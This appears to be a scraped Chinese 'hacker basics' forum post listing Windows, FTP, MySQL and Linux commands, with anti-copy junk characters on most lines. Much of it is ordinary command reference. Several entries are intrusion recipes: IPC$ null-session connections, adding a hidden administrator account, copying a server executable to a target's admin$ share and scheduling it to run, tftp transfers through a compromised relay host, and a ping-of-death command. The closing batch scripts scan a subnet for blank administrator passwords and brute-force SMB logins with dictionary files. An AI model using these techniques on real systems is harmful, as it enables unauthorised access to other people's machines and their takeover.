黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 & [: ?" A: g3 T  m
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接   w7 D, c! x- j) F
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: ) ]* A1 I2 ?- ~& W: L- l& l+ }
net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:
0 n" u( D0 X2 s! Lnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
7 M) ~$ r2 }. f4 Unet use h: /del 删除映射对方到本地的为H:的映射
6 v7 L0 D- t  o: s; I2 pnet user 用户名　密码　/add 建立用户 & h, h; s  p5 L! K2 f
net user guest /active:yes 激活guest用户 8 ^, ?! E" g' f- X8 w9 W
net user 查看有哪些用户 ! b+ Q2 U5 J3 l' A) X$ q1 c
net user 帐户名 查看帐户的属性
2 r+ o, m9 x! V( Gnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
; x3 R0 ]7 q  m, _) e, nnet start 查看开启了哪些服务
9 S. D9 a7 s' _4 }, O3 ^/ r" u; Knet start 服务名　 开启服务；(如:net start telnet， net start schedule) 2 Z! w: D) D8 K3 v
net stop 服务名 停止某服务 ( A+ e( T7 o, N
net time \\目标ip 查看对方时间 ) q) X; ~( a8 Z4 k  A
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
) t* A6 A0 z, O1 y8 Xnet view 查看本地局域网内开启了哪些共享
8 O# l# Y8 u$ q9 Ynet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
9 k+ U4 M& k& v5 @2 wnet config 显示系统网络设置 # {8 r; N& ~9 @) i+ K! R8 y
net logoff 断开连接的共享
8 r  w, @+ T4 Q# Y1 T8 lnet pause 服务名 暂停某服务
! L: h# K) L- F- l/ onet send ip "文本信息" 向对方发信息
, O# O6 R5 T) L5 wnet ver 局域网内正在使用的网络连接类型和信息 * Z; }' M8 Q8 m5 W  a: N
net share 查看本地开启的共享
; z% f  c. u' X9 P* snet share ipc$ 开启ipc$共享 - I2 O# P% M  ]6 t! U
net share ipc$ /del 删除ipc$共享 9 L6 C' F3 Z) i
net share c$ /del 删除C：共享
1 O/ ^' b' T- ~1 [8 inet user guest 12345 用guest用户登陆后用将密码改为12345 * Q  w1 X1 r  p; L
net password 密码 更改系统登陆密码
4 C5 u& B! t7 `- w0 z, P5 p8 Tnetstat -a 查看开启了哪些端口,常用netstat -an
$ V- A+ k' w- ]- onetstat -n 查看端口的网络连接情况，常用netstat -an
7 b$ \2 g; j+ ~1 Mnetstat -v 查看正在进行的工作 - M2 P% W7 V+ C5 N- `
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
; a; s; ~+ s0 r$ rnetstat -s 查看正在使用的所有协议使用情况
$ \  l/ y" D1 |3 ~nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
+ U8 N9 G, n" r5 {tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
* n0 |5 H2 ?$ ~# v' ?9 S9 Sping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
9 \8 L: {) |# P5 y9 \ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
9 l5 B2 [! _" x; W5 Y/ ^ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 * Y4 Q( t% v# P( C8 p& V1 P+ \
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
; v; K( K% Q* l& S+ pkill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
( h: L- n, v/ W6 q9 t! o% {del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 : M3 N$ O! L- c+ T: ^( U
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） 7 T9 G7 F6 K. t$ w
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
! k$ y9 P1 b2 N3 Vfc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令   }! t. N: {( [$ I
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
7 _' ~* @: m6 O# G5 F3 xat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 / }6 j' i$ Z4 G( N% E+ x
at id号 /delete 停止某个已注册的计划任务
  T, E/ ~! t3 a7 t1 l8 ~+ C1 j" _: hat 查看所有的计划任务 . V6 P' \+ Z7 o1 }: r
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 ; [5 ^' `% u+ R# \1 _
finger username @host 查看最近有哪些用户登陆 % J: V* }8 i8 I9 j* v
telnet ip 端口 远和登陆服务器,默认端口为23
/ I* V* s! _! O% C8 fopen ip 连接到IP（属telnet登陆后的命令）
$ x4 e  a6 W: k1 ]telnet 在本机上直接键入telnet 将进入本机的telnet 2 L2 C9 p2 R$ G  m
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
: _& b$ L) c+ U* H% g! Kcopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
3 n) D& b8 U" e2 g8 n; E: L  gcppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 * Z0 A, T. k7 h. |1 E' k
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
2 U7 O/ {" D+ _7 e9 y" excopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 % f& b. M0 t/ R; B* j$ e
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
/ d7 E- ?! G: _) R: \/ Ftftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
- R) t5 C" b1 u. i* Xftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) ; T# `  x7 [1 L: u" W3 m' n3 D9 x( j
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
3 H* H; J6 Z: d8 L4 b' d3 q/ r2 Narp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 " @: A3 G# ?( a. O7 |3 @
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 # E- k* P  L1 d, e
mem 查看cpu使用情况 : l$ ?- a; x4 K
attrib 文件名(目录名) 查看某文件（目录）的属性
" w6 Z4 z( ~( b3 c3 hattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 ( x4 o4 p$ X2 l; P6 n% N  h: G
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 / g% M6 t2 ?. Y% E/ C5 W: K9 U
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
) |) O8 c/ w/ j% |2 hset 指定环境变量名称=要指派给变量的字符 设置环境变量 # F7 \7 S9 ^/ @& l% p! ?
set 显示当前所有的环境变量 3 T) S# \# p8 t: J3 C. a# R7 d! Z1 Q
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 % T" w( w) K% j
pause 暂停批处理程序，并显示出：请按任意键继续.... 7 L0 Y4 g* R7 d- k
if 在批处理程序中执行条件处理（更多说明见if命令及变量） : R1 Z( ]" h( D0 v
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） 6 j, ^9 O) N& P7 E5 p- b
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
1 Q( d3 Z8 ^! {1 bfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）   m9 T& B& y9 H+ L
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 / k; ^: s5 ?1 H" P: ^- |
echo 信息 在屏幕上显示出信息
* G0 z9 m! k+ m& q% h% H* P+ Cecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中 % T* P4 Y1 ^* u. A+ E2 u. X
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
9 c' g( ?! l& f1 O. Ffind 文件名 查找某文件 ! y; B. M. r( t4 C
title 标题名字 更改CMD窗口标题名字
" M9 v  L# W5 n; y) ?/ Qcolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
" G- K; J# c9 |7 K5 u/ L/ Bprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
. o1 h$ @! W+ u/ A3 Q) }. ]print 文件名 打印文本文件
2 T& E: ?4 H; sver 在DOS窗口下显示版本信息 0 {% l" j0 L1 R# c( X% \
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） 8 z) a; V2 e: R# d# E
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS 9 f+ \3 I, X5 m0 S7 z1 X
md　目录名 创建目录
7 o4 M; D2 B/ Z; Mreplace 源文件　要替换文件的目录 替换文件
# I( @: m5 L! S+ rren 原文件名　新文件名 重命名文件名 ; i9 @0 Q+ r) X- J5 P5 ]7 K: Q; L
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 " T6 t+ o) w; p) D: O
type 文件名 显示文本文件的内容 3 U. G, n4 c/ I5 h/ s9 U
more 文件名 逐屏显示输出文件
% \( w  n3 @1 i6 rdoskey 要锁定的命令＝字符
( {: [& I' ~" zdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
0 ?2 ^, V6 y1 g  X+ staskmgr 调出任务管理器
- B9 C# B) z1 y4 E; _' Kchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 5 [- q* V. A+ z( ^& a% C
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 7 U- a" S+ j6 f7 B- ^
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe , w# `; y  W- k/ z. O5 z. {8 Z6 a: a# x
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
. w! f' `; A' f4 o& lcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? $ p& L! C6 b  p0 x
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
0 O% ]8 B* j+ e+ }" }5 Q# lregedit /e 注册表文件名 导出注册表
% v$ A/ C; l" N' B! tcacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 1 q0 ]6 P/ [+ C1 l
cacls 文件名 查看文件的访问用户权限列表
/ a$ F! M' E- l! XREM 文本内容 在批处理文件中添加注解 7 d  F! I; t) W  h0 e1 i
netsh 查看或更改本地网络配置情况2 C  q  {5 q, }& R! w
IIS服务命令：/ z9 b# b4 F4 f
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
  I5 L: D! j2 J; R3 C$ Kiisreset /start或stop 启动（停止）所有Internet服务
' @. h5 b* K5 u) Uiisreset /restart 停止然后重新启动所有Internet服务 3 d, ^9 G1 V+ R5 x  p4 [  @
iisreset /status 显示所有Internet服务状态
1 R3 g4 @' _3 t6 A7 j' miisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 : s5 \8 P/ u6 E8 z" S7 _) S: X/ P' R
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
4 N1 Q& r/ z% A( t9 O7 j' b  Iiisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
. ]: ?8 ^% X8 s- Viisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 $ [" c5 y7 h0 s- T( F
FTP 命令： (后面有详细说明内容) / u, O  X# O' x2 N
ftp的命令行格式为:# O% V' f3 D" }$ Z9 }% }" E
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
0 B5 i7 J, f1 x' E+ l7 |－d 使用调试方式。
  b9 d5 e4 R# K4 W2 a' G, A－n 限制ftp的自动登录,即不使用.netrc文件。1 Y$ Z5 M* A6 }  S; H
－g 取消全局文件名。
+ x6 ^3 \: C( m$ I! Uhelp [命令] 或 ？[命令] 查看命令说明 6 L2 F( Z; b0 S* A& f
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
* [) |7 L6 u+ B: y1 m, rpwd 列出当前远端主机目录
9 t- H6 }, B0 I8 t& tput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 % g. `3 W$ R2 W! z- r* J$ F5 h4 M
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
* `  ?( j9 l* m: P1 W) V, N1 omget [remote-files] 从远端主机接收一批文件至本地主机
: n6 F& R0 g( f. Nmput local-files 将本地主机中一批文件传送至远端主机   r' H$ `9 e9 p) o
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
* _/ i4 F1 Z, H" B+ z: K. rascii 设定以ASCII方式传送文件(缺省值)
. k$ a+ h+ w% ebin 或 image 设定以二进制方式传送文件   S  b: y) |6 N) }1 \1 C+ T& {  k
bell 每完成一次文件传送,报警提示 1 D4 t; P: N! ?7 b* T/ S4 l/ o
cdup 返回上一级目录
6 O2 F9 F1 ~- Oclose 中断与远程服务器的ftp会话(与open对应)
/ |6 x& U# ?, z& ]7 G* wopen host[port] 建立指定ftp服务器连接,可指定连接端口
; m: `; \; P6 s  F5 x% @- Hdelete 删除远端主机中的文件 ( z, Q- r1 Y: _' w# a4 [3 c. l3 c4 ^# k( M
mdelete [remote-files] 删除一批文件 5 K' \4 n+ j; o' I" K
mkdir directory-name 在远端主机中建立目录 ( f( S& U% B" s$ o( [, f) ?: g* w  ~
rename [from] [to] 改变远端主机中的文件名 1 M9 I# i% e' S
rmdir directory-name 删除远端主机中的目录
1 E0 B3 g5 D( R1 Dstatus 显示当前FTP的状态
( z9 i# U, u& |% B% ^. bsystem 显示远端主机系统类型 3 h- }" F2 v' t8 z, U3 l
user user-name [password] [account] 重新以别的用户名登录远端主机
$ [* W+ S! V4 T3 m' L. Z6 Uopen host [port] 重新建立一个新的连接 . B' Z1 V* `6 B) {
prompt 交互提示模式 $ K% @! i7 j: q/ z; r
macdef 定义宏命令 , s# P9 {; D& S* D# T) J7 y, V
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
0 S- l5 w3 r: |, s8 achmod 改变远端主机的文件权限
9 w! m; k! p+ m) I, R8 Gcase 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 ! d' ^" K/ T, S
cd remote－dir 进入远程主机目录
; \7 e4 c0 x. _2 T4 Ocdup 进入远程主机目录的父目录 ( p8 u3 }* g5 O( |7 J
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip * a" |& \3 x* M$ W8 z; X
MYSQL 命令：
! z! T. T/ I/ V& n& a) j* amysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
/ L: x; j% W2 b; @( U1 l（例：mysql -h110.110.110.110 -Uroot -P123456
. g- U- n/ I. W+ q5 i注:u与root可以不用加空格，其它也一样） 8 @: `: {+ ?' X' \
exit 退出MYSQL " m: c' r. T2 v  d
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 ( ^! i' J$ w1 }# @& n
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
+ _4 A- l, d: A$ W6 N" _# p- m  Xshow databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
* e! l0 D) h8 C8 |' G: ~use mysql；
, @# {- j; d# X/ ]' Vshow tables; 显示库中的数据表 . e( f2 [2 ^  h7 S% X2 R+ P
describe 表名; 显示数据表的结构 7 r2 }8 N& j1 N% ?
create database 库名; 建库 5 D" f: J6 H3 |  N2 v& V! m  @
use 库名；
5 F% g$ V7 q8 R: \create table 表名 (字段设定列表)； 建表
6 S' Q! ]8 a0 C% ^2 @drop database 库名; * X/ r$ \& V# a
drop table 表名； 删库和删表 4 _0 z5 s" W# V/ p
delete from 表名; 将表中记录清空
( h) {4 L: P2 F' g; Lselect * from 表名; 显示表中的记录
. K% v' K. z- @$ F# n2 C9 d" ]mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 1 r- ]* j) _' E  A7 V' t* z
win2003系统下新增命令（实用部份）：
  Q5 I" t# Z9 e2 Kshutdown /参数 关闭或重启本地或远程主机。1 w  z& Q/ x  q- T/ s4 `" ~6 |2 z" c
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
* e+ y3 }3 a$ o* V% k例：shutdown /r /t 0 立即重启本地主机（无延时） 3 j% }% `- i- T7 c
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
2 F: L2 W7 a( M5 [0 I( {3 f参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 * i" d$ h% I  g
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。! m9 K# T: n+ p/ v' g$ e& y
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程/ p- _, v6 _) B  e1 w+ F4 Z
Linux系统下基本命令： 要区分大小写8 A+ K% z' q7 o
uname 显示版本信息（同win2K的 ver） 1 g  j5 y# N0 U3 m4 r
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
* m+ F" W4 I) [$ npwd 查询当前所在的目录位置 + t! q  Z* ^& V: n( I
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
) P" W* k5 Q' a! i: v  H( }cat 文件名 查看文件内容 ! _) l4 M! [- ^
cat >abc.txt 往abc.txt文件中写上内容。 % x& W4 A% D* d6 i, ~
more 文件名 以一页一页的方式显示一个文本文件。 : J. q' s, J$ h- y6 T8 a
cp 复制文件
% d, e. |7 E$ c; C0 smv 移动文件
; G9 N+ z% Z. v: d9 brm 文件名 删除文件，rm -a 目录名删除目录及子目录
# e+ {% |! k8 {6 I; Q4 \! h6 V$ Jmkdir 目录名 建立目录 . L1 b# a6 n9 K# Z( w6 L+ t7 ?
rmdir 删除子目录，目录内没有文档。 * E6 T8 z4 @6 F3 H+ e, F
chmod 设定档案或目录的存取权限
* j5 m2 e* u. T5 @0 Ngrep 在档案中查找字符串
. R# s8 T( \, c% G2 |" g% t. ~diff 档案文件比较
& a2 C! v7 Z3 G' r$ L1 ^5 nfind 档案搜寻
8 a6 c, ], m4 v$ q4 u# hdate 现在的日期、时间
& p5 G+ g, Y% d( E% J( [; Awho 查询目前和你使用同一台机器的人以及Login时间地点
- N+ E- J5 @8 N- R( M8 _: m" a- c$ ^w 查询目前上机者的详细资料
% n# V2 n& d' r) d* {whoami 查看自己的帐号名称
; E" B3 L% |' P) mgroups 查看某人的Group 7 F: |# b/ J2 X9 I- o; ^, l3 [2 |
passwd 更改密码 # [  k8 A/ v: d0 H
history 查看自己下过的命令 : V# c0 N6 `  p9 g
ps 显示进程状态 2 }5 V- z/ J+ d- E0 J' ~" M
kill 停止某进程 " a; l% ^, [9 `# N
gcc 黑客通常用它来编译C语言写的文件 4 ?* |  g( s0 }# d# p! L7 W
su 权限转换为指定使用者 0 |# I0 }' {$ O% p: g/ E; V
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
1 [. q! v, @4 }" {( g" [ftp ftp连接上某服务器（同win2K
* V+ j; L8 \6 `( k( R+ I3 P附：批处理命令与变量9 @& ?/ c4 H3 e0 r* I5 Q& W
1：for命令及变量 基本格式：
, F5 J4 B9 a. `) {6 c2 ZFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。" N. u: Q0 D- B. u. y
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
" M8 X0 d  a1 b+ f5 \(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}+ t. [+ N8 Z, Y, B
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
6 d0 J8 @5 s- x4 v) k  d/ O- i2 |; ^/ xcommand_parameters：为特定命令指定参数或命令行开关
: }9 Z5 W8 x. a2 n% CIN (set)：指在(set)中取值；DO command ：指执行command6 x4 X3 ~( u, {0 K9 D
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 " _7 `5 D) M3 @& F5 m3 C$ u
用法举例：
5 \% a" Z9 i3 E- n, F: m@echo off 2 K8 P9 D! A1 ]: i' E
echo 用法格式：test.bat *.*.* > test.txt ; I- b9 Z/ g+ p! ^: o/ P
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
; d) D0 J" C" _0 I- r存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。
# ]$ i, d3 y" J: P5 ~5 e4 c2 v9 L! E/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 - L' d7 g! x2 |& r+ y1 a! w" V. a& t
@echo off ( m# ]# R% {+ _1 t% e
echo 用法格式：ok.bat ip * O3 n5 H0 l' d' ?3 G
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 ' a" I& K0 \0 |! M( F  [
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。
; |0 u% K% N0 b* g. E2：if命令及变量 基本格式：
" r# P  U# u! T# q7 A+ sIF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
+ f# k7 u, H; l5 b! X% X( w! X例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
) T" T' `; N0 e0 U, i0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 8 i* w( q" m' L: O" p
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。7 C6 P$ J# [- f% t2 V2 C
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
& I; r* j6 l, U1 Y: M% qIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。, M) z' s# z4 L, \, `3 f
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
' J/ ?" C5 j2 Y( B( d; o( J# \* lIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”